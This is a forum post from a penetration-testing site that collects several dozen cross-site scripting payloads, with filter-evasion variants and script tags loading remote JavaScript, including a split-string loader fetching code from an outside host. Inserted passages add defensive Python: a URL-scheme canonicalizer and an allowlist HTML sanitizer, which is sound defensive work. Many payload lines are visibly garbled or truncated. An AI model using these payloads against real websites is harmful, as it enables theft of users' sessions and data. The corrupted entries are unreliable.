China Network Penetration Testing Alliance
Title: XSS attack summary
Author: admin
Time: 2016-4-28 10:06
(1) Plain XSS JavaScript injection

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(99) Alternative alert pop-ups

<q/oncut=alert()>1
<s/onclick=alert()>b
<XSS=" onclick="alert(1)//">clickme</SSX=">
<zzz onclick=alert`1`>clickme</zzz>
<a onclick=alert`1`>clickme</a>
<a=">clickme</a=">
<a=">clickme</a>
<z=">clickme</z=">
<z onclick=alert`1`>clickme</z>
(2) IMG tag XSS using a JavaScript command

<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag with no semicolon and no quotes

<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive

<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML entity encoding (semicolons required)

<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag

<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) fromCharCode (calculator)

<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)

<IMG SRC=jav..omitted..S')>

(9) 7-bit UTF-8 Unicode encoding without semicolons (calculator)

<IMG SRC=jav..omitted..S')>

(10) Hexadecimal encoding, also without semicolons (calculator)

<IMG SRC=\'#\'" /span>

(11) Embedded tab splitting the "javascript" keyword

<IMG SRC=\'#\'" ascript:alert('XSS');">

(12) Embedded encoded tab splitting the "javascript" keyword

<IMG SRC=\'#\'" ascript:alert('XSS');">

(13) Embedded newline

<IMG SRC=\'#\'" ascript:alert('XSS');">

(14) Embedded carriage return

<IMG SRC=\'#\'" ascript:alert('XSS');">

(15) Embedded multi-line JavaScript injection, an extreme XSS example

<IMG SRC=\'#\'" /span>

(16) Working around character limits (all fragments must be on the same page)

<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character

perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2; null characters have basically no effect domestically, since there is nowhere to make use of them

perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
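Entries (3) through (19) are all the same javascript: URL written so that a naive string filter misses it: mixed case, decimal and hex entity references with or without semicolons, a tab, newline or carriage return inside the word, a NUL byte, or control characters in front. The browser's URL parser discards all of that before it reads the scheme, so a defensive check has to canonicalize the same way before deciding. The following is an added example, not code from the post: a Python check that reduces an attribute value to what the URL parser will see and then allows only a fixed set of schemes. The function names and the sample values are constructed for this example; the same check applies to the later javascript: vectors carried in BACKGROUND, HREF, META and BASE attributes ((32), (37), (41), (44) to (46), (54)).

```python
import html
import re

# Schemes the application is willing to emit in href/src/background/url() values.
# A value with no scheme (a relative or protocol-relative URL) is also accepted;
# tighten that if references to external hosts are not acceptable.
ALLOWED_SCHEMES = {"http", "https", "mailto"}

# The URL parser discards tab, LF and CR anywhere in the input and strips
# leading/trailing C0 controls and spaces before it looks at the scheme.
_IGNORED_ANYWHERE = re.compile(r"[\t\n\r]")
_C0_AND_SPACE = "".join(chr(c) for c in range(0x21))
_SCHEME = re.compile(r"([A-Za-z][A-Za-z0-9+.\-]*):")


def canonicalize(value: str) -> str:
    """Reduce a raw attribute value to what the browser's URL parser will see."""
    value = value.replace("\x00", "")          # NUL never survives tokenising (17, 18)
    value = html.unescape(value)               # &#106; &#x6A &#0000106, with or without ';' (5, 8-10)
    value = _IGNORED_ANYWHERE.sub("", value)   # tab / newline / CR inside the word (11-14)
    return value.strip(_C0_AND_SPACE)          # leading junk such as &#14; or spaces (19)


def scheme_of(value: str) -> str:
    """Lower-cased scheme of the canonical value, or '' when there is none."""
    m = _SCHEME.match(canonicalize(value))
    return m.group(1).lower() if m else ""     # JaVaScRiPt (4) collapses to javascript


def is_safe_url(value: str) -> bool:
    scheme = scheme_of(value)
    return scheme == "" or scheme in ALLOWED_SCHEMES


# Constructed sample values in the spirit of the post's vectors (not its exact strings).
SAMPLE_VALUES = [
    "javascript:alert('XSS')",
    "JaVaScRiPt:alert('XSS')",
    "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",
    "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",
    "jav&#x09;ascript:alert('XSS')",
    "jav\nascript:alert('XSS')",
    "java\x00script:alert('XSS')",
    " &#14; javascript:alert('XSS')",
    "http://example.com/logo.png",
    "/static/logo.png",
]

if __name__ == "__main__":
    for v in SAMPLE_VALUES:
        verdict = "ok   " if is_safe_url(v) else "BLOCK"
        print(verdict, scheme_of(v) or "(no scheme)", repr(v))
```

The check is deliberately an allowlist on the scheme rather than a search for the string "javascript": every variant in the list above ends up as the same canonical scheme, and anything unexpected (vbscript:, data:, a future scheme) is refused by default. It only covers the URL-attribute context; text and attribute contexts still need ordinary output encoding, which this function does not do.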
(19) IMG tag with spaces and meta characters in front of the JavaScript

<IMG SRC=\'#\'" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS

<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS, part 2

<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS, part 3

<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double opening brackets

<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)

<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2

<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS

<IMG SRC=\'#\'" /span>

(27) Double open angle brackets

<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes or semicolons

<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escape-filtered JavaScript

\";alert('XSS');//

(30) Closing the TITLE tag

</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) Input Image

<INPUT SRC=\'#\'" /span>

(32) BODY Image

<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag

<BODY('XSS')>

(34) IMG Dynsrc

<IMG DYNSRC=\'#\'" /span>

(35) IMG Lowsrc

<IMG LOWSRC=\'#\'" /span>

(36) BGSOUND

<BGSOUND SRC=\'#\'" /span>

(37) STYLE sheet

<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote stylesheet

<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image (list style)

<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBscript

<IMG SRC=\'#\'" /STYLE><UL><LI>XSS

(41) META with a linked URL

<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe

<IFRAME SRC=\'#\'" /IFRAME>

(43) Frame

<FRAMESET><FRAME SRC=\'#\'" /FRAMESET>

(44) Table

<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD

<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32&34&39&160&8192-8&13&12288&65279)

<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression

<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression

<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE tag (any tag: an open angle bracket followed by a name starting with a letter)

<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image

<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method

exppression(alert("XSS"))'>

(53) STYLE background

<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE

<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag: you can embed a Flash file that contains the XSS

<EMBED SRC="http://3w.org/XSS/xss.swf"></EMBED>
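From (19) to (55) the vectors are about the markup rather than the URL: attribute names padded with punctuation, SCRIPT/XSS, doubled angle brackets, unterminated script tags, and payloads carried by STYLE, LINK, META, BASE, EMBED, IFRAME and FRAME. A filter that blocklists those strings is exactly what this list defeats; an allowlist sanitizer that keeps only known tags and attributes and re-serializes them never has to recognise any of them. The following is an added example, not code from the post: a small allowlist sanitizer built on Python's standard html.parser. The policy table, the tags it keeps, and the sample inputs are constructed for the example; url_allowed repeats the browser's URL-parser clean-up (NUL, tab, LF and CR removed, leading controls stripped) in compact form, since html.parser has already decoded entity references by the time an attribute value reaches it.

```python
import html
import re
from html.parser import HTMLParser

# Allowlist policy (constructed for this example): tag -> attributes that may
# survive. Any tag or attribute not listed is dropped, which is what removes
# on* handlers, STYLE attributes, LINK, META, BASE, EMBED, IFRAME and friends.
ALLOWED = {
    "a": {"href", "title"},
    "img": {"src", "alt"},
    "p": set(), "b": set(), "i": set(), "ul": set(), "li": set(), "br": set(),
}
VOID = {"img", "br"}
URL_ATTRS = {"href", "src"}
SKIP_CONTENT = {"script", "style"}  # drop the element body too, not only the tags


def url_allowed(value: str) -> bool:
    """Scheme allowlist on an attribute value whose entities are already decoded."""
    v = re.sub(r"[\x00\t\n\r]", "", value).lstrip("".join(chr(c) for c in range(0x21)))
    m = re.match(r"([A-Za-z][A-Za-z0-9+.\-]*):", v)
    return m is None or m.group(1).lower() in {"http", "https", "mailto"}


class Sanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []          # re-serialized output fragments
        self.open_tags = []    # allowed, non-void elements still open
        self.skipping = None   # name of the script/style element being discarded

    def handle_starttag(self, tag, attrs):
        if tag in SKIP_CONTENT:
            self.skipping = tag
            return
        if tag not in ALLOWED:
            return  # unknown or dangerous element: the tag vanishes, its text stays
        kept = []
        for name, value in attrs:
            if name not in ALLOWED[tag] or value is None:
                continue  # covers every on* handler, however the name is padded
            if name in URL_ATTRS and not url_allowed(value):
                continue
            kept.append(' %s="%s"' % (name, html.escape(value, quote=True)))
        self.out.append("<%s%s>" % (tag, "".join(kept)))
        if tag not in VOID:
            self.open_tags.append(tag)

    def handle_endtag(self, tag):
        if tag == self.skipping:
            self.skipping = None
        elif tag in self.open_tags:
            while True:  # close anything left open inside it, keeping output balanced
                closed = self.open_tags.pop()
                self.out.append("</%s>" % closed)
                if closed == tag:
                    break

    def handle_data(self, data):
        if self.skipping is None:
            self.out.append(html.escape(data, quote=False))

    # Comments, <!DOCTYPE ...> and <? ... ?> hit the no-op default handlers and vanish.

    def result(self) -> str:
        self.close()
        while self.open_tags:  # unterminated elements are closed, never left dangling
            self.out.append("</%s>" % self.open_tags.pop())
        return "".join(self.out)


def sanitize(fragment: str) -> str:
    """Return a version of `fragment` that contains only allowlisted markup."""
    s = Sanitizer()
    s.feed(fragment.replace("\x00", ""))  # a raw NUL never reaches a browser's tag name
    return s.result()


if __name__ == "__main__":
    # Constructed inputs in the spirit of the post's vectors (not its exact strings).
    for sample in [
        "<a onclick=alert`1`>clickme</a>",
        "<IMG SRC=JaVaScRiPt:alert('XSS') alt=x>",
        '<<SCRIPT>alert("XSS");//<</SCRIPT>',
        '<STYLE>li{list-style-image:url("javascript:alert(1)")}</STYLE><UL><LI>XSS',
        '<a href="jav&#x09;ascript:alert(1)">x</a>',
    ]:
        print("%r\n  -> %r" % (sample, sanitize(sample)))
```

Because output is rebuilt from the parsed tree instead of being edited in place, the doubled brackets of (23), the unterminated script of (24) and the split tag names of (20) and (22) all reduce to either an allowed element or plain escaped text. html.parser is tolerant but not browser-identical, so for production input prefer a maintained sanitizer such as nh3 or bleach, pair it with a Content-Security-Policy that disallows inline script, and keep ordinary context-aware output encoding for everything that is not meant to be HTML at all.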
Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/)
Powered by Discuz! X3.2